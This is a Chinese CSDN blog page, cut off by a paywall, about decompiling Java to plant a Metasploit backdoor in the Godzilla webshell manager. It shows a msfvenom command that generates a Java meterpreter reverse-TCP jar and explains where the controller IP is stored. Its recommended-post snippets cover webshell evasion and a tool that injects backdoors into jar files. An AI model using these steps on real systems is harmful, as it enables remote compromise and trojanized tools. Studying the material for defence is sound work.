jar反编译工具_给哥斯拉 webshell 管理工具加后门

最新推荐文章于 2024-06-04 23:27:03 发布
最新推荐文章于 2024-06-04 23:27:03 发布
阅读量973 收藏 3
点赞数
文章标签: jar反编译工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42520132/article/details/112070981
版权
Java 反编译是分析 Java 程序的基本手段,也是对一些 Java 程序二次开发的基本前提,可用于反编译的工具有很多,比如 JD-GUI,CRF 等,个人比较常用的是 IntelliJ IDEA 自带的反编译功能,其功能足够强大,能够完成大多数需求。本文简单介绍通过反编译 MSF 生成 java 后门和 WebShell 管理工具哥斯拉,并用最简单的方式将后门加入哥斯拉中。MSF 的...
摘要由CSDN通过智能技术生成

520330abb25825d81bf9cd1d44b68122.png

Java 反编译是分析 Java 程序的基本手段,也是对一些 Java 程序二次开发的基本前提,可用于反编译的工具有很多,比如 JD-GUI,CRF 等,个人比较常用的是 IntelliJ IDEA 自带的反编译功能,其功能足够强大,能够完成大多数需求。

本文简单介绍通过反编译 MSF 生成 java 后门和 WebShell 管理工具哥斯拉,并用最简单的方式将后门加入哥斯拉中。

MSF 的 Java 后门

MSF 提供了多种类型的后门,我们可以生成一个恶意的 jar 包,此处作为演示就使用最简单且没有经过加密处理的后门。

msfvenom --payload="java/meterpreter/reverse_tcp" LHOST=127.0.0.1 LPORT=9999 -f jar > java_shell.jar

打开的 Jar 包可以看到,其中有个 metasploit.bat,里面的 HOST 就是 MSF 控制端的 IP,这样就可以通过修改这个文件来修改服务端的 IP,而无需修改生成的 class 文件。

最低0.47元/天 解锁文章
嘿 小伙
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻击工具分析:哥斯拉(Godzilla)1
08-03
介绍的也差不多了,我们来分析看看他到底强在哪。密模块分析分析脚本类型:PHP_XOR_base64具版本:3.031. 先进反编译密代码的位置位于:”sh
强大的webshell管理工具-哥斯拉
12-27
标题中的“强大的webshell管理工具-哥斯拉”指的是一个名为“哥斯拉”的软件工具,它是专门设计用于管理和控制Webshell的。Webshell是一种在Web服务器上运行的后门程序,通常由黑客植入,以远程控制服务器或执行恶意...
Java 开发:如何修改.class文件
热门推荐
一木浅雪的博客
08-16 5万+
相关工具下载地址:链接: https://pan.baidu.com/s/1Bym4V1MX-8n0OnqzSW-DdA 密码: fc5k 1.使用工具JClassLib进行修改。 详情可见: [转]如何利用JClassLib修改.class文件https://blog.csdn.net/betterandroid/article/details/14520667 备注:该方法是网上比较...
【免杀】-哥斯拉魔改(入门)
最新发布
qq_55349490的博客
06-04 1323
我们都知道哥斯拉默认生成的shell是很容易被安全软件检测出来的。所以我们需要修改shell生成逻辑,以达到免杀。除了修改指纹外,我们还需要修改数据包的密方式,以及魔改生成的shell以实现免杀的效果。我们知道,哥斯拉强大之处就在于它的插件功能。插件我们也可以尝试自己开放插件。分析多个流量包可以发现哥斯拉有3个强特征。尝试搜索关键词搜索不到,发现是。
直接修改Jar包class文件方法
Lenjor 的博客
11-04 9109
使用JBE直接修改Jar包class文件
几个处理 Java 的 class 文件的工具(转载)
abc123maxiaolong的专栏
11-03 343
本文转载自:http://qixinglu.com/post/some_handle_java_class_file_tools.html   一般来说手动修改二进制文件是件苦差事,有源码在手不如直接修改重新编译。但有些软件是不开源的,又想修改它的功能以便更好使用,就想反编译,但很 多代码都是混淆过的,反编译后几乎不能阅读,如果要改的的地方不是很多,比如最常做的是反转条件和替换字符串,这还...
使用jclasslib工具和jclasslib.jar修改class文件中String常量(详细图文教程)
Lu_mingfeii的博客
09-19 1013
32位版本jdk1.8无法使用 推荐安装64位如下图。
哥斯拉1.0_webshell管理_
09-30
【标题】:“哥斯拉1.0_webshell管理_”是一个关于使用名为“哥斯拉”的Webshell管理工具的专题,旨在帮助用户更好地理解和操作Webshell以进行网站安全管理。 【描述】:哥斯拉1.0是一款高效且功能丰富的Webshell...
kingkong:解密哥斯拉webshell管理工具流量
04-16
解密哥斯拉Godzilla-V2.96 webshell管理工具流量 目前只支持jsp类型的webshell流量解密 Usage 获取攻击者上传到服务器的webshell样本 获取wireshark之类的流量包,一般甲方有科来之类的全流量镜像设备,联系运维人员...
哥斯拉3.03.rar
08-12
webshell工具哥斯拉
Web安全-Godzilla(哥斯拉Webshell管理工具使用
Boom!脑洞大爆炸的博客
07-03 4665
Web安全-Godzilla(哥斯拉Webshell管理工具使用
CLASS直接修改工具
06-07
CLASS文件直接修改工具,相当好用,大家可以试试哟!
ajar:带有指定 .java 文件的自动后门 .jar 文件
06-25
文件 ajar.py -b <backdoor> -t <target> [-o <outfile>] 将 backdoor.java 注入 target.jar。 可能证明在中间人攻击中很有用。 这发生在: 将 target.jar 解压到 ./tmp/ 解析 Main-Class 值的清单 将 Main-Class 更改为后门 修改后门在自己的main()方法末尾调用原initial.class的main()方法 将修改后的 backdoor.java 编译为 ./tmp/backdoor.class 重新压缩 ./tmp/* 到 outfile.jar (默认是 backdoor.jar) 如果后门是一个持久性函数(例如侦听套接字的外壳程序),请确保将其分离到它自己的线程中,否则主应用程序将永远不会执行。 工具假定 javac 在您的路径中,您可以
Java下的Class代码查看器+修改器
01-27
Java下的Class代码查看器+修改器
第59篇:蓝队分析辅助工具箱V0.58更新,兼容jdk8至jdk20|shiro解密|哥斯拉解密|各种java反编译...
ABC_123的博客
07-16 1万+
Part1 前言大家好,我是ABC_123(应该是第69篇,题目编号弄错,抱歉)。“蓝队分析辅助工具箱”就是把我平时写的蓝队小工具集合起来形成的,重点解决蓝队分析工作中的一些痛点问题。本期解决了一直让ABC_123伤脑筋的jdk8到jdk11到jdk17到jdk20的兼容性问题。解决办法简单但是也不简单,简单是因为,就是把不兼容的jar包给替换掉或者注释掉;不简单是因为,保证功能可用的同时保证...
渗透干货分享:从0到1哥斯拉项目反编译初步搭建
xnxqwzy的博客
08-01 1014
今天上github搜索哥斯拉项目时,看到了有人发布了哥斯拉源码的项目。最初以为是哥斯拉作者发布了项目源码,点进这个项目一看,原来是反编译构建的哥斯拉源码。于是心血来潮,决定也对该哥斯拉3.0.3版本,也就是哥斯拉作者发布的最新版本进行反编译生成可运行的项目。0x02 构建pom.xml此次使用的环境:。项目地址如下:下载最新版的v3.0.3-godzilla将下载后的文件用jd-gui打开。
Java笔记:使用javassist修改class文件内方法
liufang_imei的博客
09-24 2634
在工作突然有一个需求。线上运维的一个tomcat的web项目,运行的程序不正常。需要修改代码。可是这个项目代码非常的老,并且公司存储的源代码跟线上的不一致。我了个擦,没有源代码但是还要结局客户的问题。只能到线上将对应程序的class文件拷贝到本地进行修改,每修改一部分就上传到线上覆盖掉之前的class文件,重启tomcat进行测试。(过程想当麻烦)修改class字节码文件用到 IDEA工具反编译class进行查看代码,javassist工具进行修改。
直接修改class文件 工具:jclasslib
longtingjing的专栏
09-12 1万+
1、用class file editor打开要修改的class,找到要修改的行号(如果597行) 2、编写main方法来修改 package test; import java.io.DataInput; import java.io.DataInputStream; import java.io.File; import java.io.FileInputStream; import
java class 修改工具_直接修改别人jar包里面的class文件 工具:jclasslib
weixin_36350479的博客
02-13 1293
出于某些原因需要把别人jar包里面的class修改一下信息配置文件*.properties MANIFEST.MF 这些东西可以直接用记事本打开修改 然后替换掉就OK..在网上游荡了半天,没有找到合适的方法开始我是先用jd-gui反编译 把我需要修改的那个A.class文件反编译出来把代码保存到A.Java然后直接在dos里面用javac A.java编译问题来了..因为A.java引用了很多其他...
哥斯拉webshell管理工具下载
12-29
最后,通过命令行或者终端执行启动命令,即可开始使用哥斯拉工具管理您的webshell。 需要注意的是,在下载和使用任何软件时,请确保从官方网站或者可信赖的第三方网站下载,避免下载和安装来自未知来源的软件,以免...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值